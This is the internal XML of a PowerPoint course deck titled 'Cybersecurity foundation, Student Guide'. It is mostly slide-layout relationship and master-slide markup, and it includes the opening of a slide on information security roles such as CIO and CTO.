Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout442.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout447.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout432.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout446.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout431.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout436.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout441.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout435.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout445.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout440.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout434.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout439.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout444.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455.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout460.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout450.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout454.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout459.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme29.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout449.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout463.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout448.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout453.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout458.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout452.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout462.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout457.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout451.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout456.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout46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theme" Target="../theme/theme3.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6.pn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4.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theme" Target="../theme/theme5.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image" Target="../media/image9.png"/><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6.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theme" Target="../theme/theme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19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><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theme" Target="../theme/theme8.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image" Target="../media/image11.png"/><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image" Target="../media/image9.png"/><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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout133.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme9.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9/10/2025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6037294"/>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0958110"/>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57F1E4F-1CFF-5643-939E-217C01CDF56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371393"/>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3543622"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt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 id="2147483895" r:id="rId14"/>
    <p:sldLayoutId id="2147483896" r:id="rId15"/>
    <p:sldLayoutId id="2147483897" r:id="rId16"/>
    <p:sldLayoutId id="2147483898"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2618507"/>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00013956"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt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32" r:id="rId15"/>
    <p:sldLayoutId id="2147483933" r:id="rId16"/>
    <p:sldLayoutId id="2147483934"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930983"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt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6036524"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt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 id="2147483967" r:id="rId14"/>
    <p:sldLayoutId id="2147483968" r:id="rId15"/>
    <p:sldLayoutId id="2147483969" r:id="rId16"/>
    <p:sldLayoutId id="2147483970"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8" name="Straight Connector 7"/>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2647094"/>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82303849"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt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4012"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7121236"/>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0401678"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt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7519584"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt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6250043"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt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 id="2147484061" r:id="rId12"/>
    <p:sldLayoutId id="2147484062" r:id="rId13"/>
    <p:sldLayoutId id="2147484063" r:id="rId14"/>
    <p:sldLayoutId id="2147484064" r:id="rId15"/>
    <p:sldLayoutId id="2147484065" r:id="rId16"/>
    <p:sldLayoutId id="214748406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57F1E4F-1CFF-5643-939E-217C01CDF565}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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374633"/>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 id="2147484076" r:id="rId9"/>
    <p:sldLayoutId id="2147484077" r:id="rId10"/>
    <p:sldLayoutId id="2147484078"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0522172"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt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089" r:id="rId10"/>
    <p:sldLayoutId id="2147484090" r:id="rId11"/>
    <p:sldLayoutId id="2147484091" r:id="rId12"/>
    <p:sldLayoutId id="2147484092" r:id="rId13"/>
    <p:sldLayoutId id="2147484093" r:id="rId14"/>
    <p:sldLayoutId id="2147484094" r:id="rId15"/>
    <p:sldLayoutId id="2147484095" r:id="rId16"/>
    <p:sldLayoutId id="2147484096"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7847469"/>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 id="2147484110" r:id="rId13"/>
    <p:sldLayoutId id="2147484111" r:id="rId14"/>
    <p:sldLayoutId id="2147484112" r:id="rId15"/>
    <p:sldLayoutId id="214748411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1364270"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk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 id="2147484128" r:id="rId14"/>
    <p:sldLayoutId id="2147484129" r:id="rId15"/>
    <p:sldLayoutId id="2147484130" r:id="rId16"/>
    <p:sldLayoutId id="214748413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1657708"/>
      </p:ext>
    </p:extLst>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 id="2147484144" r:id="rId12"/>
    <p:sldLayoutId id="2147484145" r:id="rId13"/>
    <p:sldLayoutId id="2147484146" r:id="rId14"/>
    <p:sldLayoutId id="2147484147" r:id="rId15"/>
    <p:sldLayoutId id="2147484148" r:id="rId16"/>
    <p:sldLayoutId id="214748414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820215"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk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15941470"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147484169" r:id="rId1"/>
    <p:sldLayoutId id="2147484170" r:id="rId2"/>
    <p:sldLayoutId id="2147484171" r:id="rId3"/>
    <p:sldLayoutId id="2147484172" r:id="rId4"/>
    <p:sldLayoutId id="2147484173" r:id="rId5"/>
    <p:sldLayoutId id="2147484174" r:id="rId6"/>
    <p:sldLayoutId id="2147484175" r:id="rId7"/>
    <p:sldLayoutId id="2147484176" r:id="rId8"/>
    <p:sldLayoutId id="2147484177" r:id="rId9"/>
    <p:sldLayoutId id="2147484178" r:id="rId10"/>
    <p:sldLayoutId id="2147484179" r:id="rId11"/>
    <p:sldLayoutId id="2147484180" r:id="rId12"/>
    <p:sldLayoutId id="2147484181" r:id="rId13"/>
    <p:sldLayoutId id="2147484182" r:id="rId14"/>
    <p:sldLayoutId id="2147484183" r:id="rId15"/>
    <p:sldLayoutId id="214748418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413680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D57F1E4F-1CFF-5643-939E-217C01CDF565}" type="slidenum">
              <a:rPr lang="en-US" smtClean="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7787635"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt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2877515"/>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926347"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt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836763"/>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7898508"/>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B61BEF0D-F0BB-DE4B-95CE-6DB70DBA9567}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9/10/2025</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35298"/>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0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03.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout320.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout32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20.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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05.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout322.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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06.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout322.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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07.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout32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20.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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09.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout322.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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3.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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10.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout32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37.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout33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37.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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14.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout33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37.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout339.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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17.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout339.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout339.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout339.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6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37.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout337.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide122.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:bobby@10.1.0.10" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide122.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout337.xml"/></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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout33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3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3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7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79.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79.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7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7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79.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout179.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7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79.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17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7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79.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17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5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5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5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5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5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58.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide145.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide145.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout224.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.etsi.org/technologies/consumer-iot-security" TargetMode="Externa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24.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout22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2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24.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224.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/themeOverride" Target="../theme/themeOverride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2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2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24.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15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55.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout192.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15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56.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19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9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90.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9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0.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192.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/themeOverride" Target="../theme/themeOverride2.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190.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/themeOverride" Target="../theme/themeOverride3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.pn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190.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/themeOverride" Target="../theme/themeOverride4.xml"/></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190.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/themeOverride" Target="../theme/themeOverride5.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190.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/themeOverride" Target="../theme/themeOverride6.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6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6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6.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide168.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68.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout38.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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69.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout38.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.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80.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide170.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70.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout38.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8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8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8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176.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout384.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82.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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78.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout36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6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0.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365.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/themeOverride" Target="../theme/themeOverride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98.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98.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98.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98.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98.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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186.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout417.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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187.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout417.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout417.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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89.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4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1.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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90.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41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415.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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192.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout417.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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93.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41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415.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43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43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449.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449.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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99.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout451.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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00.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout451.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449.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide202.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202.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.jpeg"/></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10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1.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15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7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17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8.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08.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90.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90.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9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout193.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07.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07.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07.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207.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09.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7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20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3.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6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24.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224.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2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24.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2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4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41.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout243.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout24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58.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout260.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260.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26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5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5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75.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277.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27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75.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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout27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7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7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75.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8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86.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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout286.xm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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout286.xml"/></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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout286.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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout286.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide86.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3.org/2001/XMLSchema-instance" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide86.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout286.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3.org/2001/XMLSchema"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8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8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03.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0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03.xml"/></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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout303.xml"/></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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout305.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout303.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout303.xml"/></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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout303.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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97.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout303.xml"/></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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout305.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.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8977F2-0D87-CFE7-4759-33DE09BB42C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cybersecurity foundation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9565B05-4864-8563-8072-F18C9991FFA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Student Guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3025989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B87E-E54E-0426-7693-BA564DEC94B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Information Security Roles and Responsibilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6DD717A-662B-2CAC-333B-7E8FDC6A3939}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249486"/>
            <a:ext cx="10237788" cy="4405314"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Overall responsibility for the IT function lies with a Chief Information Officer (CIO). This role might also have direct responsibility for security. Some organizations will also appoint a Chief Technology Officer (CTO), with more specific responsibility for ensuring effective use of new and emerging IT products and solutions to achieve business goals.</a:t>
            </a:r>
